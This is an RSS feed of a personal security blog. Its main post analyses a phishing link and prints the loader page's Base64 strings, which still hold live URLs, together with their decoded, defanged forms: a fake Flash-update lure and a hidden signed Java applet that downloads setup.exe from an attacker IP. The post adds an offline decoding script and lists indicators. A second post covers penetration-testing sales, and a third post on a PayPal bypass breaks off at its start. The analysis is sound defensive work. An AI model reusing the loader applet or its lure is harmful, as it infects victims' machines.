<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>WTF.uzz</title>
	<atom:link href="http://www.wtfuzz.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.wtfuzz.com</link>
	<description>Order in Chaos &#124; A personal weblog of Rishi Narang</description>
	<lastBuildDate>Fri, 20 Apr 2012 16:34:21 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Journey of a Phishing Link</title>
		<link>http://www.wtfuzz.com/blogs/journey-of-a-phishing-link/</link>
		<comments>http://www.wtfuzz.com/blogs/journey-of-a-phishing-link/#comments</comments>
		<pubDate>Wed, 18 Apr 2012 13:21:22 +0000</pubDate>
		<dc:creator>Rishi Narang</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[link]]></category>
		<category><![CDATA[linkedin]]></category>
		<category><![CDATA[malicious]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[pastebin]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://www.wtfuzz.com/?p=372</guid>
		<description><![CDATA[We come across so many links via social networking websites, and we unknowingly click many of them. A malicious link can have catastrophic results: your system or your privacy is compromised, or your data takes the hit. Here is one such analysis of a link dated 17.April.2012 that I came across via [...]]]></description>
			<content:encoded><![CDATA[<p>We come across so many links via social networking websites, and we unknowingly click many of them. A malicious link can have catastrophic results: your system or your privacy is compromised, or your data takes the hit. Here is one such analysis of a link dated 17.April.2012 that I came across via Twitter and LinkedIn.</p>
<p><i>NOTE: All links have been defanged with the non-clickable prefix &#8220;hxxp://&#8221; in place of http:// to prevent mistaken clicks.</i></p>
<p>Someone posted this link (hxxp://pastebin.com/dRGHt7hy) in a tweet. On checking, it was a list of URLs (actually a single URL pasted multiple times, a sign of desperation),</p>
<ol>
<li>hxxp://tinyurl.com/saw87hujnworeg </li>
<li>hxxp://tinyurl.com/saw87hujnworeg </li>
<li>hxxp://tinyurl.com/saw87hujnworeg </li>
<li>hxxp://tinyurl.com/saw87hujnworeg      <br />9954 credit card numbers </li>
</ol>
<p>It claims the link leads to 9954 credit card numbers. The first hint that something is wrong: why paste the same link four times in one entry instead of posting the data directly?</p>
<p><span id="more-372"></span></p>
<p>Next, this is far too tempting a target, so tread carefully. I opened the link in Malzilla (hxxp://malzilla.sourceforge.net/), a malware hunting tool, with auto-redirect disabled. The link &quot;hxxp://tinyurl.com/saw87hujnworeg&quot; redirected to &quot;hxxp://212.95.43.243/jdb/inf.php?id=0b740ebcc2abbc5512c4875a0f74965b&quot;, which Malzilla showed as raw text with embedded scripts. Apart from a few headings and titles, the page contained only one doubtful script.</p>
<p>Here is the only important script contained within the page. Let&#8217;s do the analysis.</p>
<p>The script is hard to read because of its long variable names, so let&#8217;s first shorten them. Here is the modified script with short variable names; the logic and behavior are unchanged.</p>
<p>Now it is easy to follow what the script does. First, let us decode the strings passed to <b>setTimeout</b> and <b>document.write</b>. They look Base64-encoded, so let&#8217;s try to decode them. The encoded strings are,</p>
<ol>
<li><font size="2" face="Courier New">QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlIGxhdGVzdCB2ZXJzaW9uIQ==</font> </li>
<li><font size="2" face="Courier New">aHR0cDovLzIxMi45NS40My4yNDMvamRiL2xpYi9hZG9iZS5waHA/aWQ9MGI3NDBlYmNjMmFiYmM1NTEyYzQ4NzVhMGY3NDk2NWI=</font> </li>
<li><font size="2" face="Courier New">DQoJCTxhcHBsZXQgd2lkdGg9IjBweCIgaGVpZ2h0PSIwcHgiIGNvZGU9IlNpdGVMb2FkZXIuY2xhc3MiIGFyY2hpdmU9Imh0dHA6Ly8yM<br />TIuOTUuNDMuMjQzL2pkYi9saWIvamF2YS9saXZlcy8wYjc0MGViY2MyYWJiYzU1MTJjNDg3NWEwZjc0OTY1Yi5qYXIiPg0KCQk8cGFyYW<br />0gbmFtZT0id2NaUE4iIHZhbHVlPSJodHRwOi8vMjEyLjk1LjQzLjI0My9qZGIvbGliL2xvYWQucGhwP2lkPTBiNzQwZWJjYzJhYmJjNTU<br />xMmM0ODc1YTBmNzQ5NjViIj4NCgkJPHBhcmFtIG5hbWU9InY4VE9YIiB2YWx1ZT0ic2V0dXAuZXhlIj4NCgkJPHBhcmFtIG5hbWU9Ikxl<br />Z3ltIiB2YWx1ZT0id3d3LmRvZ3NjYXN0LmNvbSI+DQoJCTxwYXJhbSBuYW1lPSJNcEJERyIgdmFsdWU9IkFQUERBVEEiPg0KCQk8L2Fwc<br />GxldD4=</font> </li>
</ol>
<p><em>Decoded strings are,</em></p>
<ol>
<li><font size="2" face="Courier New">Adobe Flash must be updated to view this, please install the latest version!</font> </li>
<li><font size="2" face="Courier New">hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b</font> </li>
<li><font size="2" face="Courier New">&lt;applet width=&quot;0px&quot; height=&quot;0px&quot; code=&quot;SiteLoader.class&quot; archive=&quot;hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar&quot;&gt;<br />&lt;param name=&quot;wcZPN&quot; value=&quot;hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b&quot;&gt;<br />&lt;param name=&quot;v8TOX&quot; value=&quot;setup.exe&quot;&gt;<br />&lt;param name=&quot;Legym&quot; value=&quot;www.dogscast.com&quot;&gt;<br />&lt;param name=&quot;MpBDG&quot; value=&quot;APPDATA&quot;&gt;<br />&lt;/applet&gt;</font> </li>
</ol>
<p>The first decoded string is the lure: the page tells the victim that Flash must be updated, and the second string is the address of the fake update. The third string is a zero-size Java applet that the page writes into the document, so the browser loads it without anything visible. Between them, the page will issue GET requests to the following links,</p>
<ol>
<li>hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b </li>
<li>hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar </li>
<li>hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b </li>
</ol>
<p>And the applet parameters are,</p>
<ol>
<li>name=&quot;wcZPN&quot; value=&quot;hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b&quot; </li>
<li>name=&quot;v8TOX&quot; value=&quot;setup.exe&quot; </li>
<li>name=&quot;Legym&quot; value=&quot;www.dogscast.com&quot; </li>
<li>name=&quot;MpBDG&quot; value=&quot;APPDATA&quot; </li>
</ol>
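<p>The decoding above can be scripted instead of done by hand. The following Node.js script is an added example, not the page's loader script and not a tool the post used: it takes the three Base64 strings quoted above (the third re-joined across the line breaks shown), decodes them, pulls out the URLs and the applet parameters, classifies each parameter value as a URL, file name, host name or other, and reports everything defanged. The function names and the classification rules are mine; the page supplies only the strings and their decoded forms.</p>

```javascript
// Added example (not the page's own script): static decoder for the Base64
// strings the loader page passes to setTimeout() and document.write().
// Runs offline under Node.js; nothing here touches the network.

// The three strings quoted in the post. The third is the applet tag split
// across the six fragments shown there; the <br /> breaks are not data.
const ENCODED = [
  'QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlIGxhdGVzdCB2ZXJzaW9uIQ==',
  'aHR0cDovLzIxMi45NS40My4yNDMvamRiL2xpYi9hZG9iZS5waHA/aWQ9MGI3NDBlYmNjMmFiYmM1NTEyYzQ4NzVhMGY3NDk2NWI=',
  'DQoJCTxhcHBsZXQgd2lkdGg9IjBweCIgaGVpZ2h0PSIwcHgiIGNvZGU9IlNpdGVMb2FkZXIuY2xhc3MiIGFyY2hpdmU9Imh0dHA6Ly8yM' +
    'TIuOTUuNDMuMjQzL2pkYi9saWIvamF2YS9saXZlcy8wYjc0MGViY2MyYWJiYzU1MTJjNDg3NWEwZjc0OTY1Yi5qYXIiPg0KCQk8cGFyYW' +
    '0gbmFtZT0id2NaUE4iIHZhbHVlPSJodHRwOi8vMjEyLjk1LjQzLjI0My9qZGIvbGliL2xvYWQucGhwP2lkPTBiNzQwZWJjYzJhYmJjNTU' +
    'xMmM0ODc1YTBmNzQ5NjViIj4NCgkJPHBhcmFtIG5hbWU9InY4VE9YIiB2YWx1ZT0ic2V0dXAuZXhlIj4NCgkJPHBhcmFtIG5hbWU9Ikxl' +
    'Z3ltIiB2YWx1ZT0id3d3LmRvZ3NjYXN0LmNvbSI+DQoJCTxwYXJhbSBuYW1lPSJNcEJERyIgdmFsdWU9IkFQUERBVEEiPg0KCQk8L2Fwc' +
    'GxldD4=',
];

// Base64 to text, tolerating the whitespace that copy/paste and HTML wrapping add.
function decodeBase64(s) {
  return Buffer.from(s.replace(/\s+/g, ''), 'base64').toString('utf8');
}

// The post's hxxp:// convention: make a URL unclickable before it is written anywhere.
function defang(url) {
  return url.replace(/^http(s?):\/\//i, 'hxxp$1://');
}

// Every http(s) URL in a blob; whitespace, quotes and angle brackets end a URL.
function extractUrls(text) {
  return text.match(/https?:\/\/[^\s"'<>]+/gi) || [];
}

// code=, archive= and every <param> of the first <applet> in the text, or null.
function extractApplet(html) {
  const m = html.match(/<applet\b([^>]*)>([\s\S]*?)<\/applet>/i);
  if (!m) return null;
  const attr = (name) => (m[1].match(new RegExp(name + '="([^"]*)"', 'i')) || [])[1];
  const params = {};
  const re = /<param\s+name="([^"]+)"\s+value="([^"]*)"/gi;
  let p;
  while ((p = re.exec(m[2])) !== null) params[p[1]] = p[2];
  return { code: attr('code'), archive: attr('archive'), params };
}

// Rough classification of a parameter value (rules are mine, not from the page).
// File names are tested before host names because "setup.exe" also looks like a host.
function classify(value) {
  if (/^https?:\/\//i.test(value)) return 'url';
  if (/\.(exe|dll|scr|jar|bat|vbs|js)$/i.test(value)) return 'file';
  if (/^[a-z0-9-]+(\.[a-z0-9-]+)+$/i.test(value)) return 'host';
  return 'other';
}

// Decode all strings, collect defanged URLs and classify the applet parameters.
function analyse(encoded) {
  const decoded = encoded.map(decodeBase64);
  const urls = new Set();
  for (const text of decoded) for (const u of extractUrls(text)) urls.add(defang(u));
  const applet = decoded.map(extractApplet).find(Boolean) || null;
  const classified = applet
    ? Object.entries(applet.params).map(([name, value]) => ({ name, value, kind: classify(value) }))
    : [];
  return { decoded, applet, urls: [...urls], classified };
}

// Print an analyst-friendly summary and hand back the structured result.
function report(encoded) {
  const r = analyse(encoded);
  console.log('lure text :', r.decoded[0].trim());
  if (r.applet) console.log('applet    :', r.applet.code, 'from', defang(r.applet.archive));
  for (const p of r.classified) console.log('param     :', p.name, '=', defang(p.value), `(${p.kind})`);
  console.log('URLs      :', r.urls);
  return r;
}

report(ENCODED);
```

<p>Run it with node and you get the three defanged URLs the post lists, plus each applet parameter tagged as url, file, host or other. Decoding with a script rather than a browser-side tool matters here because the strings only reach setTimeout and document.write at run time; handling them as data keeps the page from ever executing.</p>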
<p><em>Let us now access these URLs.</em></p>
<ol>
<li>
<div align="left">First I accessed the adobe.php URL (hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b) via Malzilla, and it downloaded a file &quot;Adobe-Flash_WIN.exe&quot; to my system, approximately 1.16 MB in size. Scanned via <b>VirusTotal</b>, it was detected by only 2 of 42 anti-malware products. Now, this is scary. I didn&#8217;t get a chance to do the run-time analysis of this file, but I will post it in the next blog. </div>
</li>
<li>On accessing the second URL (hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar), it downloads a JAR file &quot;0b740ebcc2abbc5512c4875a0f74965b.jar&quot;. Extracting it yields a &quot;META-INF&quot; directory and a &quot;SiteLoader.class&quot; file, the class named in the applet tag above. The contents of META-INF include,
<ol>
<li>JUBUHUSE.DSA </li>
<li>JUBUHUSE.SF </li>
<li>MANIFEST.MF </li>
</ol>
The .SF and .DSA pair means the JAR is code-signed. A signed applet prompts the user to trust the signer and, once accepted, runs outside the applet sandbox with the user&#8217;s privileges, which is what a loader needs if it is to write and start a file. The parameters the page hands it (a download URL, the file name &quot;setup.exe&quot; and the directory name &quot;APPDATA&quot;) point that way, but confirming what SiteLoader.class does with them would need the class decompiled, which is not covered here.</li>
<li>Now let&#8217;s analyze the third URL, load.php (hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b), via Malzilla. When accessed, this link downloads a &quot;setup.exe&quot; file to the host. It is the same file as the one downloaded earlier: the SHA-256 hash &quot;cb3869fa81086e4f91a61663ccac100f5099ccf4564a971f955f1a61d37aecf5&quot; matches. </li>
</ol>
<p>This is a brief analysis of a phishing link which started as a Pastebin link on Twitter, passed through a URL shortener to a loader page, and ended by delivering an executable to your system by two routes: a fake Flash update and a hidden, signed Java applet.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.wtfuzz.com/blogs/journey-of-a-phishing-link/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>PenTest &#8211; What to look for?</title>
		<link>http://www.wtfuzz.com/blogs/pentest-what-to-look-for/</link>
		<comments>http://www.wtfuzz.com/blogs/pentest-what-to-look-for/#comments</comments>
		<pubDate>Fri, 24 Feb 2012 18:59:17 +0000</pubDate>
		<dc:creator>Rishi Narang</dc:creator>
				<category><![CDATA[PenTest]]></category>
		<category><![CDATA[assessment]]></category>
		<category><![CDATA[client]]></category>
		<category><![CDATA[magazine]]></category>
		<category><![CDATA[market]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[privacy]]></category>
		<category><![CDATA[questions]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.wtfuzz.com/?p=326</guid>
		<description><![CDATA[Published Source (PenTest Magazine, June 2011): http://pentestmag.com/june-issue-what-should-you-look-for/ Vulnerabilities are increasing by leaps and bounds, and any industry, technical or non-technical, has to grow its security in sync or else it becomes a highly vulnerable and lucrative target. There is news of data loss and breaches every now and then. A rough estimate of the growth of [...]]]></description>
			<content:encoded><![CDATA[<p>Published Source (PenTest Magazine, June 2011): <a href="http://pentestmag.com/june-issue-what-should-you-look-for/">http://pentestmag.com/june-issue-what-should-you-look-for/</a></p>
<p>Vulnerabilities are increasing by leaps and bounds, and any industry, technical or non-technical, has to grow its security in sync or else it becomes a highly vulnerable and lucrative target. There is news of data loss and breaches every now and then. A rough estimate of the growth of reported vulnerabilities over 1995-2008 is shown in <b>Figure 1</b>. This counts only vulnerabilities that were reported; hundreds of active (unreported or unpatched) vulnerabilities circulate underground in the hands of profit-driven black-hat attackers.</p>
<p><img style="background-image: none; border-right-width: 0px; margin: 0px 0px 9px 9px; padding-left: 0px; padding-right: 0px; display: inline; float: right; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="" border="0" alt="" align="right" src="http://www.wtfuzz.com/wp-content/uploads/2012/02/image3.png" width="369" height="189" /></p>
<p>This exponential growth in vulnerabilities, and the ease of exploitation with automated kits, demands that security stays on its toes. Every time information security is discussed, it has to be related to its three key pillars: Protection, Detection and Response (<b>Figure 2</b>). If these pillars are strengthened well, they lower the chances of any known vulnerability being exploited in your network. To keep security on its toes and well maintained, a client has to consider a penetration testing engagement to verify the security controls and validate response times. So, what is penetration testing all about?</p>
<p><img style="background-image: none; border-right-width: 0px; margin: 0px 9px 4px 0px; padding-left: 0px; padding-right: 0px; display: inline; float: left; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="" border="0" alt="" align="left" src="http://www.wtfuzz.com/wp-content/uploads/2012/02/image4.png" width="227" height="222" /></p>
<p>Penetration Testing (or PT) is a widely used term with a broad meaning. It generally refers to a method of evaluating the security posture of a network, system or device by simulating an attack or a hacker’s activity. It is closely tied to Vulnerability Management (or VM), but the two differ in application and implication. VM is commonly a part of any PT or risk assessment, but in general PT has more to do with active exploitation of the resources in scope, whereas VM deals with the identification and quantification of vulnerabilities, not their exploitation. Overall a PenTest supports all three pillars: it verifies whether the security controls can be bypassed, and it verifies the logging, monitoring and alerting systems.</p>
<p>We are living in an era where cyber war and cyber-attacks are no longer fiction, and even cyber espionage is part of everyday discussion. We have hundreds of portals with security feeds, malware news and recent vulnerabilities available online. But are all these news items, podcasts and blogs important for your business? You have deployed a number of software packages and devices in your network, and you specifically need a risk assessment report that<span id="more-326"></span>caters to your requirements and technology setup, instead of white papers shouting about exploitable applications which are not even installed inside your enterprise perimeter. An enterprise PT report usually has three main sections, as shown in <b>Figure 3</b>, customized to the enterprise business model.</p>
<p><img style="background-image: none; border-right-width: 0px; margin: 0px 0px 9px 8px; padding-left: 0px; padding-right: 0px; display: inline; float: right; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="" border="0" alt="" align="right" src="http://www.wtfuzz.com/wp-content/uploads/2012/02/image7.png" width="362" height="142" /></p>
<p>Each of these sections can be further divided into sub-topics according to the application/network setup, security controls, technical processes, compliance terms and conditions, etc. In short, the <b>background</b> <b>information</b> describes the type of business the client is in. Its main purpose is to prioritize severity ratings and to provide remediation methods that suit the client’s IT and business model. Similarly, the <b>discovery</b> phase of the report covers the network architecture, application/host details and physical/virtual address space, which determines the scope of the penetration test to be carried forward. The vulnerability identification, exploitation and remediation steps are attempted according to the findings of this discovery phase.</p>
<p>After planning, it is time to find something and assess it. <b>Vulnerability identification</b> assesses the in-scope resources and quantifies possible bugs, gaps and vulnerabilities in the applications, software and/or devices. After confirming these findings with manual methods, tools and automated systems, the <b>vulnerability exploitation</b> (or infiltration) phase comes into the picture. This phase not only exploits the vulnerabilities but also confirms the impact of exploitation in terms of the client’s business role and model. The key point is that <i>exploiting a vulnerability may not be equally critical for two different business units with different priorities and offerings.</i></p>
<p>Finally comes the recommendation phase, which includes the <b>mitigation</b> steps that render a vulnerability non-exploitable, or patch the applications as new versions, hotfixes and other information become available. A step further, the recommendations can also include the <b>implementation</b> of new services, devices or software to prevent attacks on the client’s network and business.</p>
<p>The common thread through all these phases is that none of them is standard: with every client it differs, with every business model the execution of these phases takes a twist, and with every virtual or physical location of the client there are changes and customizations needed. These are only the headings; the content depends heavily on the client. That is what makes it a business need, and an offering worthy of investment and understanding.</p>
<p>To support penetration testing, various automated vulnerability management solutions are available in the market. VM solutions play an important part in automating the vulnerability assessment phase and in producing reports and graphs for the enterprise. They have evolved into single-click operations: you feed in the prerequisites and they generate the final report with all the assessments done. A brief layout of their market growth is projected in <b>Figure 4</b>. The difference is that vulnerability exploitation is usually not part of it, and the severity of the findings in the report is based on the generic nature of the vulnerability rather than on your business model.</p>
<p><img style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; float: left; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="" border="0" alt="" align="left" src="http://www.wtfuzz.com/wp-content/uploads/2012/02/image6.png" width="522" height="276" /></p>
<p>How a client responds to and approaches a PT engagement depends on how well it understands the engagement in relation to its business and enterprise network. In my experience, clients (mostly businesses) usually have two modes of operation when it comes to investing in information security services,</p>
<ol>
<li>Market Driven </li>
<li>Privacy Driven </li>
</ol>
<p>From a bird’s-eye view there are always grey areas, but at a granular level there are different key factors driving a client’s concern about where its funds flow: towards development or towards security. Some clients give higher importance to their consumer base and its information, and some to their final products and services. The line is thin, but it surely exists!</p>
<p><b><u>Market Driven Operations</u></b> </p>
<p>The market-driven approach is mainly regulated by the wish to stay a step ahead of competitors, always focused on holding all the high-level certificates that can earn the enterprise a top place with respect to available compliance regimes, policies and standards. The key reason for such an approach is to acquire a market position and the trust of customers, with valid proof in ink.</p>
<p>To approach this client, the key question is: <b>how will this pen-testing service give it an edge over others?</b> All the discussions revolve around it, and the presentation slides have the key motto of showing that this PT service is worth the boost it provides (an advantage or a necessity). Irrespective of the client’s standing in the market, it is ready to invest in sources which can give its customers better trust and confidence in its products and services. And, more importantly, it can publicize that too!</p>
<p>In the discussions there are various questions a client wishes to confer about. They can range from the proficiency of the PT team to upcoming challenges, pressure from the market, the security community, etc.</p>
<p><b><u>Privacy Driven Operations</u></b> </p>
<p>These are clients that are actually concerned about security, network traffic and the uptime/downtime of services. They invest in security because they do not wish an attacker to compromise their servers and networks, and they are very much aware of the key worms, malware and attacks through the news and sometimes even via underground networks. These clients have people appointed to understand technical terms and findings, and people who can cross-question a pen-testing team.</p>
<p>To approach this client, the key question is: <b>how is this pen-testing service different from others?</b> Even when the client is highly literate in its own security, and has deployed security guidelines to its business and development teams, what makes it important to invest in a third-party penetration testing service? The presentation slides revolve around the technical strengths of the team, and detailed intelligence has to be gathered before ringing the bell.</p>
<p>During the kickoff meetings, or even the proposal presentation, the pen-testing team occasionally receives curious questions from the customer. Most of them point to one fundamental question: <b>how can we be sure that your team (the PT team) falls in the league of the good guys?</b> Even though it is obvious to any information security firm, it can raise an eyebrow if the firm has a one-liner about information security in its corporate policy but no real knowledge of it. Even when you are technically sound, you have to prove that the pen-test will not create a mess at the customer’s end and, more importantly, how the engagement report will benefit the client. There are legal contracts to sign and all the important paperwork to perform, but convincing a non-technical client about the benefits of PT is the most challenging part.</p>
<p>These days, vulnerability management solutions also face restraints from the industry. Some of them are listed in <b>Figure 5</b>.</p>
<p><img style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; float: right; border-top: 0px; border-right: 0px; padding-top: 0px" title="" border="0" alt="" align="right" src="http://www.wtfuzz.com/wp-content/uploads/2012/02/image9.png" width="569" height="266" /></p>
<p>I will share one such experience with a client. The client is in the health care business, but for confidentiality reasons, and given the scope of this article, let’s not go into its location and name. Our team scheduled an appointment with the MD of this firm and proposed the need for a full-fledged PT engagement. The foremost step before you walk in to any customer is to have thorough background knowledge, including the nature of the business, locations, data criticality, online footprint, etc. We were not dealing with compliance checks or audits; we were a technical team proposing to perform a PT engagement. To strengthen our proposal, we had already gathered enough information about the cracks in their security by observing their workflow and via different sources. The firm’s MD and some other members with professed ‘security knowledge’ raised an eyebrow as soon as we presented our synopsis of the complete plan, before digging into the in-depth discussions. </p>
<p>The four key questions were, </p>
<p><b>Q1.</b> Why do we need a PenTest when we have never been breached in the past and have a good track record in security?</p>
<p><b>A1.</b> The fact that you have not been breached in the past does not quantify or insure security for the future. There are other possibilities, such as,</p>
<ul>
<li>You have been breached but are still unaware of it, because the attacker just copied the information without altering any document.      <br /><i>A PT assignment may help you find traces of such a breach.</i></li>
<li>You have not been breached because the attackers could not find any golden egg in your basket, or are unaware of your existence. With your expansion and bright business prospects, you can be the next target.      <br /><i>A PT report will document such holes before anyone else does!</i></li>
<li>It may not be an external breach: an internal employee may be trading information with external entities. How will you regulate and verify privilege escalation?     <br /><i>A PT report will document gaps in security policies and configurations to the management.</i></li>
</ul>
<p><b>Q2.</b> We have a secured facility with all kinds of physical and virtual controls, then why do we need this kind of assessment?</p>
<p><b>A2.</b> Physical and virtual controls are appreciable, but how often is it checked that people actually follow them, that users and employees adhere to the controls and have not devised a way to bypass them? Deploying and maintaining are two different realms of security, and individuals who are not checked and educated/trained on time usually tend to look for short-cuts.</p>
<ul>
<li>How do you maintain the ID cards, and ensure that no duplicate card is issued without proper documentation and deactivation of the previous record?     <br /><i>The PT report will also note any duplicate logs or possible intrusions using the same electronic key.</i></li>
<li>How do you maintain the permission levels for different individuals in the firm, where a certain group is restricted to a certain facility?     <br /><i>The PT report will document the permission levels and possible breaches if there is a firm policy, and we can also provide guidance in documenting such a policy.</i></li>
</ul>
<p><b>Q3.</b> The customers have access to their records with a password protected online portal, so no one else can get hold of their information.</p>
<p><b>A3. </b>Password security is much more complex than firms perceive it to be, and there are many aspects that need to be considered along with passwords,</p>
<ul>
<li>How is password complexity maintained? Does the online portal enforce strong alphanumeric passwords of a minimum length? If not, a weak password is as good as an open door.     <br /><i>A PT assignment will assess these controls and the permissible passwords and complexity rules.</i></li>
<li>How do you make sure the session tokens and/or cookies are random, and are generated and expired in due course? If they are not managed and randomized properly, passwords are of no use, as anyone can hijack anyone else’s session.     <br /><i>A PT report will document such findings, the feasibility of brute-force attacks, and the randomness of such values.</i></li>
<li>Even if all the password rules are met and the cookies and sessions are properly randomized, there are literally hundreds of checks and vulnerabilities in an ill-coded or obsolete application that can let an attacker breach and steal your resources.     <br /><i>A PT report will present all such findings and application vulnerabilities, and will also provide ways to mitigate them.</i></li>
</ul>
<p><b>Q4.</b> We have an anti-malware solution, firewalls etc. deployed and no-one has the right to tinker with it except a third party security vendor. We are very safe!</p>
<p><b>A4.</b> Anti-malware solutions, firewalls and IDS/IPS are as good as a soldier with shield and ammunition: everything depends on how well he is trained to protect.</p>
<ul>
<li>How do you configure the firewall to best suit your business needs and network traffic requirements?     <br /><i>The PT report helps analyze the configuration of servers, devices (firewall/IDS/IPS or UTM) and clients against hardened security.</i></li>
<li>How do you make sure that the configurations performed by the administrator deliver the best results for your business?     <br /><i>The PT report helps find gaps against popular guidelines, CIS benchmarks or the firm’s global policies.</i></li>
</ul>
<p>I am sure these are the kind of questions asked by individuals who are oblivious to security incidents and real-world case studies. They hide their resources and rely on the security of the past. With due respect, we answered all such queries, focusing on the need for security assessments.</p>
<p>But some customers have a very different set of reasons ‘against’ penetration testing,</p>
<p><b>R1.</b> We already know where everything is broken.</p>
<p><b>R2.</b> If you tell us what&#8217;s wrong, we&#8217;ll have to fix it.</p>
<p><b>R3.</b> We don&#8217;t have anything that hackers want.</p>
<p><b>R4.</b> We&#8217;re too small to matter.</p>
<p><b>R5.</b> We haven&#8217;t fixed the things you found broken last time.</p>
<p><b>R6.</b> Our employees don&#8217;t know how to do bad things.</p>
<p>While these reasons may seem hard for any pen-tester to refute, they certainly are not! Any security team can counter them with proper homework and case studies. </p>
<p><b>[R1]</b> Knowing that you (the customer) are broken does not tell you how to mend the cracks. There are two approaches,</p>
<ul>
<li>A band-aid approach, which means temporarily mending a crack in security</li>
<li>A hardened approach, which reflects a strong solution that fixes the gap</li>
</ul>
<p>A pen-test report can help you with recommendations and mitigation steps for the gaps you are already aware of. </p>
<p><b>[R2]</b> On the other hand, if you are afraid that you will have to fix it, fixing it now is always better than a future attack that might go beyond your ability to fix.</p>
<p><b>[R3]</b> What hackers want is at their discretion alone. Instead of attacking you for confidential data, an attacker may only be using your computing power to perform DoS attacks, or installing bots on your corporate network. You never know a real hacker’s intention until you experience it on your own resources. </p>
<p><b>[R4]</b> Even a chain of household computers, once compromised, can be leveraged to bring big enterprises to their knees in the era of cyber war. Nothing is too small to matter when you have computing power, internet access and a revenue-generating model. </p>
<p><b>[R5]</b> That is a bad approach to security! If you have not fixed the gaps identified previously, you may already have been a victim of attacks or, at worst, be introducing fresh vulnerabilities. The attack surface grows over time as public disclosures and ready-made exploits for old or obsolete vulnerabilities become available. What initially required a skilled hacker, if left unfixed, can later be exploited by a script kiddie.</p>
<p><b>[R6]</b> Humans are the weakest link in security, and irrespective of all the guidelines and procedures you train employees on, they are no match for an individual’s curiosity.</p>
<p>Clients often have questions about how the PenTest report is categorized. Some clients leave the format of the report to the vendor performing the PenTest; sometimes the clients supply their own template. PenTests are often known for producing a bulky report that clients tend not to read. The report can be tweaked into sections and sub-titles that put an effective spotlight on critical items and vulnerabilities. Sections that come in handy for a client are a management overview or summary, where graphs and pie charts show the observations, and a body in which the client should see severity ratings based either on the vulnerability’s exploitation (remote/local, or ease) or on the exposure of its resources to the findings in the network. This categorization and display of results helps the client understand the priority in fixing the vulnerabilities and gaps.</p>
<p>All in all, a PenTest engagement is very beneficial for a client or enterprise if it is carried out well and presented with good reports, graphs and charts. A client should consider fixing these vulnerabilities before an attacker exploits them. Moreover, these PT reports aid the client in assessing its network and security.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.wtfuzz.com/blogs/pentest-what-to-look-for/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Critical Vulnerability in PayPal</title>
		<link>http://www.wtfuzz.com/blogs/critical-vulnerability-in-paypal/</link>
		<comments>http://www.wtfuzz.com/blogs/critical-vulnerability-in-paypal/#comments</comments>
		<pubDate>Sat, 02 Jul 2011 05:31:51 +0000</pubDate>
		<dc:creator>Rishi Narang</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[paypal]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.wtfuzz.com/blogs/critical-vulnerability-in-paypal/</guid>
		<description><![CDATA[One of our readers, Farhan, has discovered* that some websites using a PayPal portal for payment are vulnerable and can be exploited using simple JavaScript. The JavaScript bypasses the payment page and redirects the user to the download page for products such as software or eBooks. He has already informed PayPal about this issue and they [...]]]></description>
			<content:encoded><![CDATA[<p>One of our readers, <strong>Farhan</strong>, has discovered<a title="citation below!" href="javascript: void(0)">*</a> that some websites using a PayPal portal for payment are vulnerable and can be exploited using simple JavaScript. The JavaScript bypasses the payment page and redirects the user to the download page for products such as software or eBooks. He has already informed PayPal about this issue, and they replied to his vulnerability submission. The reply reads,</p>
